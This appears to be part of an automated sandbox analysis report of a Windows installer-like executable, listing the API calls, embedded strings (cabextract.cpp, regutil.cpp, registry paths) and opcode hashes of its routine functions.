                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorEventLast
                                                            • String ID: Failed to set begin operation event.$cabextract.cpp
                                                            • API String ID: 3848097054-4159625223
                                                            • Opcode ID: a6aec462aee606219059e05c57cd2048d82f5e69f546b7c72dde3725a72e95a6
                                                            • Instruction ID: c8ccfb72813d66ce2a488b350332f175799654e5a3842931088c75b009e3c94f
                                                            • Opcode Fuzzy Hash: a6aec462aee606219059e05c57cd2048d82f5e69f546b7c72dde3725a72e95a6
                                                            • Instruction Fuzzy Hash: 8DF0A737A426356B8A2132995D0AA8B76A4FF04B717154135FE05F7240E665EC40CAD6
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 0088EBE0
                                                            • GetLastError.KERNEL32 ref: 0088EBEA
                                                            Strings
                                                            • Failed to post apply message., xrefs: 0088EC18
                                                            • EngineForApplication.cpp, xrefs: 0088EC0E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                            • API String ID: 2609174426-1304321051
                                                            • Opcode ID: b62d5a0e166c139b30d7a02e195556add905e04ad22e828195f7f37907809529
                                                            • Instruction ID: 63199743b5fe1a8a2720dba4e170bf75e16e7e92b53122172c194b8fbb50f52b
                                                            • Opcode Fuzzy Hash: b62d5a0e166c139b30d7a02e195556add905e04ad22e828195f7f37907809529
                                                            • Instruction Fuzzy Hash: 7FF0A733E5163567D621269A9C0DE8BBFD4FF04B70B024124FE18FA281D674DC0086D5
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 0088EC71
                                                            • GetLastError.KERNEL32 ref: 0088EC7B
                                                            Strings
                                                            • Failed to post detect message., xrefs: 0088ECA9
                                                            • EngineForApplication.cpp, xrefs: 0088EC9F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessagePostThread
                                                            • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                            • API String ID: 2609174426-598219917
                                                            • Opcode ID: edbd3873e69e2c446b6904a910d3d2f57d0391b5e5547ff570d9a6836ca23ab7
                                                            • Instruction ID: 1527eb6089bf2e2cfffc7768eb1c90b3407e1f0511282a9bae4087961de7ef7a
                                                            • Opcode Fuzzy Hash: edbd3873e69e2c446b6904a910d3d2f57d0391b5e5547ff570d9a6836ca23ab7
                                                            • Instruction Fuzzy Hash: 35F02733A50231A7C630379AAC09F87BF94FF04B70B024024BD58FA280D670DC00C2D5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: __alldvrm$_strrchr
                                                            • String ID:
                                                            • API String ID: 1036877536-0
                                                            • Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                            • Instruction ID: 64c081d1e6561ffe69e0c5ec15707118ab5f3ff21192737baef73575d8af8bfa
                                                            • Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                            • Instruction Fuzzy Hash: 85A16775A003869FFB21CF28C8817AEBBA1FF12350F2C416DE495DB685E2398961C751
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: dlutil.cpp
                                                            • API String ID: 1659193697-2067379296
                                                            • Opcode ID: 6fd913e03d4b2e3f067f0996625b216d84c0aca4c7d35e543d4acd481f8246f6
                                                            • Instruction ID: 48990e052d9e516e51cf30fb67e7fb44a70d8dba60f57265427d0c5987b622a1
                                                            • Opcode Fuzzy Hash: 6fd913e03d4b2e3f067f0996625b216d84c0aca4c7d35e543d4acd481f8246f6
                                                            • Instruction Fuzzy Hash: A651B172902A1AABDB119FA58C80AEFBBB9FF88710F154115F900F7350DB75DD118BA0
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,008A2444,00000000,00000000,008A3479,?,008A3479,?,00000001,008A2444,ECE85006,00000001,008A3479,008A3479), ref: 008A9278
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008A9301
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 008A9313
                                                            • __freea.LIBCMT ref: 008A931C
                                                              • Part of subcall function 008A521A: HeapAlloc.KERNEL32(00000000,?,?,?,008A1F87,?,0000015D,?,?,?,?,008A33E0,000000FF,00000000,?,?), ref: 008A524C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 573072132-0
                                                            • Opcode ID: 3281866ced9487234b17f3cd43019169cf22a0efbc3efb11c892b4ffef9d6fd8
                                                            • Instruction ID: ecc01b7f0820c8906f2672b1db0261e3a58c8d6001573a6fcb2a8889a161d06a
                                                            • Opcode Fuzzy Hash: 3281866ced9487234b17f3cd43019169cf22a0efbc3efb11c892b4ffef9d6fd8
                                                            • Instruction Fuzzy Hash: A931B032A0420AABEF249F68CC85EAE7BB5FB41710F144228FC58D7291EB35DD51CB90
                                                            APIs
                                                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00875552,?,?,?,?,?,?), ref: 00874FFE
                                                            • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,00875552,?,?,?,?,?,?), ref: 00875012
                                                            • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00875552,?,?), ref: 00875101
                                                            • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00875552,?,?), ref: 00875108
                                                              • Part of subcall function 00871161: LocalFree.KERNEL32(?,?,00874FBB,?,00000000,?,00875552,?,?,?,?,?,?), ref: 0087116B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                            • String ID:
                                                            • API String ID: 3671900028-0
                                                            • Opcode ID: f40a4685ae596c8d42e02ab60b067ea9cad3a7fdd9590bacb3110ccc2b74c522
                                                            • Instruction ID: d15c553eec70500bdaa447486a3c256e32fe34dcad80d8d6b49d1df949f4e980
                                                            • Opcode Fuzzy Hash: f40a4685ae596c8d42e02ab60b067ea9cad3a7fdd9590bacb3110ccc2b74c522
                                                            • Instruction Fuzzy Hash: 164108B1500B059BCA30EBB8C849BDB73ECFF05300F448929B6AED3155EB74E5458B62
                                                            APIs
                                                              • Part of subcall function 0087F96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,00874CA5,?,?,00000001), ref: 0087F9BC
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 00874D0C
                                                            Strings
                                                            • Unable to get resume command line from the registry, xrefs: 00874CAB
                                                            • Failed to get current process path., xrefs: 00874CCA
                                                            • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00874CF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close$Handle
                                                            • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                            • API String ID: 187904097-642631345
                                                            • Opcode ID: 51912dc4e3e8aba6ca1813fc113515527804257b1536af53188d9a90842133c1
                                                            • Instruction ID: 0c12dfee4abeb0c14292b67dbed301ccee547a6a59c83ce703cbeb5ae3a37ccf
                                                            • Opcode Fuzzy Hash: 51912dc4e3e8aba6ca1813fc113515527804257b1536af53188d9a90842133c1
                                                            • Instruction Fuzzy Hash: 32116A31D41518FA8F22AB99DC018EEBFB8FF50710B1081A6F814E2319EB71CA10EA81
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008A8A56,00000000,00000000,?,008A8859,008A8A56,00000000,00000000,00000000,?,008A8A56,00000006,FlsSetValue), ref: 008A88E4
                                                            • GetLastError.KERNEL32(?,008A8859,008A8A56,00000000,00000000,00000000,?,008A8A56,00000006,FlsSetValue,008D2404,008D240C,00000000,00000364,?,008A6230), ref: 008A88F0
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,008A8859,008A8A56,00000000,00000000,00000000,?,008A8A56,00000006,FlsSetValue,008D2404,008D240C,00000000), ref: 008A88FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: 4b4584f3982febd0d78b2c1b05a1ebc2a9334d630bfba45aee88fd0fd7d8725e
                                                            • Instruction ID: 3c6643abb01d440345e12ef0ac5a5b633d7447dcd3577a6d3dcf7d3a93ff9843
                                                            • Opcode Fuzzy Hash: 4b4584f3982febd0d78b2c1b05a1ebc2a9334d630bfba45aee88fd0fd7d8725e
                                                            • Instruction Fuzzy Hash: 5701F732741226EBEB214B69DC44A7B7B98FF06BA1B140720F906E3640EF60DC0087F1
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,008A1AEC,00000000,80004004,?,008A1DF0,00000000,80004004,00000000,00000000), ref: 008A6162
                                                            • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008A61CA
                                                            • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 008A61D6
                                                            • _abort.LIBCMT ref: 008A61DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_abort
                                                            • String ID:
                                                            • API String ID: 88804580-0
                                                            • Opcode ID: dc78b3378e66cdbe311b5de42cdacf2215151d52b0bae40098e7f822fa73afdd
                                                            • Instruction ID: dc2ac8ab560c21f968f33013b9e11c9ae89881e424495a85b8f6a47e99c0c659
                                                            • Opcode Fuzzy Hash: dc78b3378e66cdbe311b5de42cdacf2215151d52b0bae40098e7f822fa73afdd
                                                            • Instruction Fuzzy Hash: 5BF08136104E11E6E71233296C0AB2F3B59FBC3765B290225FA24D6A9AFF6488524126
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00877441
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 008774A8
                                                            Strings
                                                            • Failed to get value as numeric for variable: %ls, xrefs: 00877497
                                                            • Failed to get value of variable: %ls, xrefs: 0087747B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                            • API String ID: 3168844106-4270472870
                                                            • Opcode ID: b92762af3e8199b90ae4935e394b07495ff2c85ab5f7912fa6f2bb43a2312528
                                                            • Instruction ID: e4a245f3411cc3f6e07d1fc323b36da7260df7e6707568bd38ef766385125505
                                                            • Opcode Fuzzy Hash: b92762af3e8199b90ae4935e394b07495ff2c85ab5f7912fa6f2bb43a2312528
                                                            • Instruction Fuzzy Hash: C1014C36944229ABCF215E58CC05A9E7F64FF10721F15C161FC08EA221C376DE10EA99
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 008775B6
                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 0087761D
                                                            Strings
                                                            • Failed to get value of variable: %ls, xrefs: 008775F0
                                                            • Failed to get value as version for variable: %ls, xrefs: 0087760C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                            • API String ID: 3168844106-1851729331
                                                            • Opcode ID: 3f49b5b6118081839ba17ba0fedc47c86a1f2b1dea1062ff404bc415235fc538
                                                            • Instruction ID: 8f98866162a31e92475de72507fbdc773f2dc36152942e6627bd8e194441f75b
                                                            • Opcode Fuzzy Hash: 3f49b5b6118081839ba17ba0fedc47c86a1f2b1dea1062ff404bc415235fc538
                                                            • Instruction Fuzzy Hash: C9015A32944529EBCF225F88CC09A9E3B68FF20725F008561FD08EA225D376DE10DBD5
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,00879897,00000000,?,00000000,00000000,00000000,?,008796D6,00000000,?,00000000,00000000), ref: 00877545
                                                            • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,00879897,00000000,?,00000000,00000000,00000000,?,008796D6,00000000,?,00000000), ref: 0087759B
                                                            Strings
                                                            • Failed to copy value of variable: %ls, xrefs: 0087758A
                                                            • Failed to get value of variable: %ls, xrefs: 0087756B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeave
                                                            • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                            • API String ID: 3168844106-2936390398
                                                            • Opcode ID: 4e34dc6c646cc3340f1337ac343f496b6d2c5df0f32fe675573b6b17b46496c2
                                                            • Instruction ID: 6c720942f8f1e76cf454366645ca23fddb31b1fcd304db3bfb62f53bdf564069
                                                            • Opcode Fuzzy Hash: 4e34dc6c646cc3340f1337ac343f496b6d2c5df0f32fe675573b6b17b46496c2
                                                            • Instruction Fuzzy Hash: 0DF01976944229BBCF126B98CC0999E7B68FF14761F048160FD18EA224C776DE209BD5
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 0089E788
                                                            • GetCurrentThreadId.KERNEL32 ref: 0089E797
                                                            • GetCurrentProcessId.KERNEL32 ref: 0089E7A0
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0089E7AD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                            • String ID:
                                                            • API String ID: 2933794660-0
                                                            • Opcode ID: d4ce9929cc77a146d28d3e7878b06039827131084f1ca616ae37300cfa41afe6
                                                            • Instruction ID: 755f4f8970852b2d00f46c440599a88efc2c17bc885f5b966a24d3ac69894673
                                                            • Opcode Fuzzy Hash: d4ce9929cc77a146d28d3e7878b06039827131084f1ca616ae37300cfa41afe6
                                                            • Instruction Fuzzy Hash: E9F04D71C1020DEBCB00DBB4D949A9EBBF8FF18315F514995A415E7210E774AB049B61
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008B0DD7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID: regutil.cpp
                                                            • API String ID: 3535843008-955085611
                                                            • Opcode ID: f41a5a6c1f18aa656c3604e69ea95ab3256f9299862564363037f2010bd583c8
                                                            • Instruction ID: df79f7afc4ef956e2ea0cbd33b5a2177248b23159ad39f5d6d40e9d533008551
                                                            • Opcode Fuzzy Hash: f41a5a6c1f18aa656c3604e69ea95ab3256f9299862564363037f2010bd583c8
                                                            • Instruction Fuzzy Hash: C141BF32D0152AEBDB318AD8C8047EF7B61FB00760F298365B915EA3A0D734AD50AF91
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008B48FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                            • API String ID: 47109696-3023217399
                                                            • Opcode ID: 4ec14be6c6b63a49a9c1e23f04a6c4eb7078a8d7f857ddd8e1d68f741420e67d
                                                            • Instruction ID: 7876e9e4cd50b245f1b751b07227000e3515ffd33fbf9332406bbcde8ae66e38
                                                            • Opcode Fuzzy Hash: 4ec14be6c6b63a49a9c1e23f04a6c4eb7078a8d7f857ddd8e1d68f741420e67d
                                                            • Instruction Fuzzy Hash: EF416C75E00259ABCB20DF98C882AEEBBB5FB44B10F21507AE514EB312DB319E51DB50
                                                            APIs
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 008B112B
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 008B1163
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: QueryValue
                                                            • String ID: regutil.cpp
                                                            • API String ID: 3660427363-955085611
                                                            • Opcode ID: 90f1c04a21bfbf16c1bb238887aef05fddbe2705fd235b005b419fe34808cb7b
                                                            • Instruction ID: e6c935cfd2f3d578ab8b5fe6d53c63c83ddfd1294cc89ba92c170d2f4f556bb6
                                                            • Opcode Fuzzy Hash: 90f1c04a21bfbf16c1bb238887aef05fddbe2705fd235b005b419fe34808cb7b
                                                            • Instruction Fuzzy Hash: 02418E72D0012AEBDF209F9C8C599EEBBB9FF10350F50816AEA14EB350D7319E119B90
                                                            APIs
                                                            • WideCharToMultiByte.KERNEL32(008BB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 008A67A3
                                                            • GetLastError.KERNEL32 ref: 008A67BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorLastMultiWide
                                                            • String ID: comres.dll
                                                            • API String ID: 203985260-246242247
                                                            • Opcode ID: a0b379e656579c745364bbeba50d312ac35f5685f1693eeaf3b87f71db7ec4f4
                                                            • Instruction ID: aaa83e41f1ce177335b53a72c141b0ea8db844104a2472918cd9d9e93c3ecf11
                                                            • Opcode Fuzzy Hash: a0b379e656579c745364bbeba50d312ac35f5685f1693eeaf3b87f71db7ec4f4
                                                            • Instruction Fuzzy Hash: 6D3107306102159BEB21AF58C885AAB7B68FF43768F1C0269F814C7995FB708D20C7A1
                                                            APIs
